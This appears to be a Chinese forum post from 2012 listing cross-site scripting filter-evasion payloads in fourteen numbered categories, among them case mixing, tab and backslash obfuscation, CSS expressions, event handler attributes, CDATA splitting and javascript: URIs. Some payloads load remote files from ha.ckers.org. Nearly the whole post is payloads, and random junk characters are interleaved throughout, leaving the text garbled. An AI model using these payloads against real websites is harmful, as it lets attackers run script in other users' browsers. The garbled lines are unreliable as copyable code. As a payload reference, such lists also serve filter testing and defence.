1. 改变字符大小写8 p6 A3 l( E& B; Q! Z5 @* j
8 q4 c7 R6 E9 q% d
. @: ~. S. a# @: g- U5 _$ t. I4 e9 J
<sCript>alert(‘d’)</scRipT>
0 m1 D; z8 {3 t, E: M6 `3 I: E; f4 R7 ?3 ^" C: s0 N" N0 }
2. 利用多加一些其它字符来规避Regular Expression的检查
0 A5 M/ R5 L- x4 B
2 Q% t3 }8 W# Z* o8 b <<script>alert(‘c’)//<</script>* U, M7 B f8 ~. V
`8 G" N9 `0 V# J& I; i
<SCRIPT a=">" SRC="t.js"></SCRIPT>
0 G* u" X' b6 S8 k& h# L, `
+ W2 \! [% n# M% s9 [ <SCRIPT =">" SRC="t.js"></SCRIPT>" a6 M- w# S% T. K
2 W. b6 [! S3 n1 N <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
$ g3 b+ P& K5 R2 z" [$ K6 U7 Q8 ^" W5 h% s- R# |$ k4 ~
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
: I$ g- }2 Q+ ]% O! f" P( [5 N M( w4 j- d
<SCRIPT a=`>` SRC="t.js"></SCRIPT>8 x! L2 d L* e+ }" q. ?
7 P' S+ W4 b! n0 L* n/ z& [
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>9 { L. p* O+ E& L* M5 _ B. s
4 p" i; O' \+ a& S$ K& d
3. 以其它扩展名取代.js
! l7 ~# C% c# h0 ~; K
1 l0 U) X% _' _" V! W( P <script src="bad.jpg"></script>6 c- X) p# p1 I$ c
/ J7 Y0 p9 D( k- K2 \; S* A4. 将Javascript写在CSS档里( q/ z% [& M f
; ], i4 Z& C/ j
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">1 c4 O2 }' h& V1 k }
/ m, y; e* }8 Q3 q
example:
' B) v+ o/ {; w& k" v |( o! P W4 _ x( t) u, Q' j7 y
body {
! {+ |. K; _& g* a' Y
9 ~% T" C( _0 x- l! q background-image: url(‘javascript:alert("XSS");’)( o( q1 S, a" W0 \% \
4 U& V! H% ] e4 x: p9 j }3 K( S- I6 a4 |6 {
- \, y% ^+ M, N4 |
5. 在script的tag里加入一些其它字符: T, j3 r7 z$ o5 Z F' E
. A: \2 U6 C/ N& h' d* _9 T: @+ a
<SCRIPT/SRC="t.js"></SCRIPT>
' ^% ?" m* F5 _# t. i1 F" r G
! H4 N6 y' f w* t <SCRIPT/anyword SRC="t.js"></SCRIPT>* g8 n$ D8 I+ z' m
& M! f4 ^# l- \, S& d1 v6 |. g5 q6. 使用tab或是new line来规避9 f' N% [- w K* T& w9 P
. |' o3 T5 d' |; ^; L <img src="jav ascr ipt:alert(‘XSS3′)">
- Z* t2 ^0 n! |
6 H2 a- h; _' ?2 Z- } <img src="jav ascr ipt:alert(‘XSS3′)">! R, Y0 X l! R
# j, k3 S2 L* \- y) n( V <IMG SRC="jav ascript:alert(‘XSS’);">3 f. w6 b$ ?2 S
: y- Q2 f9 E2 l: s( E; Z
-> tag) W$ R9 }& Y1 w: n4 p* q H
& R T2 ?$ d1 \% S
-> new line- e9 e {/ l* g; r6 j
/ o6 N# P# a8 D( J; ~- u
7. 使用"\"来规避, G; W6 ], l) r4 M. A2 n7 d
( ^& z9 o. \" m1 u H o
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
& e5 Y8 p8 @; g- \& l, ^, n+ k' z0 X7 m9 Q: B, \
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
7 J! v0 i1 L8 _+ u1 R
! l3 E& d B8 E( } <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">1 r- k5 P- e3 M0 p
, [( E- V- }+ H$ \
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">/ `5 u) l4 t. W; ]- a, P; m
: z& ?6 B4 m4 k" D9 o <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>$ C/ q+ n# k3 G {1 L
, O3 i0 N3 ?) ]9 X8. 使用Hex encode来规避(也可能会把";"拿掉)
: ?. s/ n y- p( }5 `9 T: I- M; z* I7 w
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 M* p; W$ w3 {2 T h2 N' `0 T/ M5 F% Y+ F, d+ ?. {& d- n
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
3 N: W7 C. x8 ^/ Z' O# U
1 ~! M/ `- L8 ?5 B- \7 V- z$ h0 G# } <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
B: Q' _/ y7 \; u0 ?, Z% N, S
1 |( d( ?* ~0 l. K7 {. @ 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
3 r1 P9 _0 U5 a6 H% F
) V- `3 C1 s/ B0 Z+ `% l1 ?9. script in HTML tag" \" y/ B/ o6 Q) a% L
g8 W: c i c( n6 Z
<body onload=」alert(‘onload’)」>6 c6 |0 u: y0 Y
- y- h# i( P* h: w. w4 O
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
6 q" C8 m V6 F, h9 c, M) _' \: I1 f! N! P/ m# q
10. 在swf里含有xss的code
. U- C6 g" v3 j9 K* K: O" J) q5 n$ M/ V/ r8 B4 z1 D& V
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
1 }1 X' k9 q% m% j& E7 g" S3 p I: l
/ T6 e* p d% { s' N% w( P11. 利用CDATA将xss的code拆开,再组合起来。6 }2 M; r. u" b& u
0 y* m3 {! l7 V6 @6 E8 G <XML ID=I><X><C>2 O( f2 w& X1 W7 m: l
5 _" y5 |0 X/ @5 j" H <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>7 p- w$ X% P( m$ A) [: S
4 P& Q: n9 E# F6 ?# l
</C></X>. H7 R; U) U! t6 [* s
! j3 t3 Z' W0 N8 z- l0 }
</xml>
3 @; k8 h- {2 I/ y- Y5 K- | i5 [! Z% Z ^ o6 n) ^: x9 L8 z
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>7 n9 k5 e. ]; Y f
; J6 u7 M" E: @' a/ r+ r: N" B
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>) Q9 y/ a% N0 k( b: c- d+ j
; z; Q( v: X. v: d( z5 T
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>4 X \6 W: b: R1 Z \" X
' X, m: F5 f8 n- a" o8 [
12. 利用HTML+TIME。. y9 \* q- F, F
y: S$ |$ q1 F" w
<HTML><BODY>, V( i* I! q6 B2 i* n2 _! r [7 l
2 E) @% V' K- [4 q& j( }( k( f: [
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
6 F; U+ X3 Y, h/ x& S1 @1 n. R# ?7 W( v) i! u
<?import namespace="t" implementation="#default#time2">
6 v- W) F9 d1 X* @; n
$ |3 h' y( P2 C( c: P d <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">% _) h0 A6 i Y
' P F h3 K4 K9 o1 [. |
</BODY></HTML>
) j! s6 Q N1 H6 s8 a
& Z; O8 q) ~1 g* b13. 透过META写入Cookie。
- u. }. b: r) ~! h; Y- M( w2 L! u
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">% j4 ~' p( S6 O
( b }% F7 y" W. D* z2 ~
14. javascript in src , href , url
% [6 R6 m/ j+ j" x
/ h# g; l! r4 ]" \: ] <IFRAME SRC=javascript:alert(’13′)></IFRAME>. J6 c- W7 k8 Z( i% {
4 z* g9 t6 Z Y: ?) k4 ?
<img src="javascript:alert(‘XSS3′)">
* U* ^) {. |2 ^4 L" h1 c4 S1 K- I' q
<IMG DYNSRC="javascript:alert(‘XSS20′)">
/ ]4 i: a4 [$ t$ S2 z
9 K$ m, [3 x. z0 u4 w <IMG LOWSRC="javascript:alert(‘XSS21′)">; X1 o E+ g7 h$ ]$ v* O
( `$ Y) n8 b/ [$ }2 [/ Q! f& [ <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">$ n* M+ T: k( x1 S; W
/ O0 q ~ Z& o6 l9 @5 x# s
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>0 C) I& s7 s: f5 ~' @! p' G5 g; E
& a M* B9 d# w' V4 r& l
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">& G8 k8 T) K( r' P
g+ t6 F# y& ?' |. v <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
: k2 F, G6 A: K6 m
2 B s) G% C* h% y2 `* X <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
/ W3 {' A% k5 X( P" P0 z% B* H% L. s P, m9 M! v! R- W
</STYLE><A CLASS=XSS></A>
8 [4 Z7 [9 p' E( _$ o& S/ U$ I( l6 X+ ` ]# B
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>1 |" H) Y% ?, J; t
0 f8 v. I( B" s2 k6 T |
发表于 2012-12-31 09:59:28
收藏
支持
反对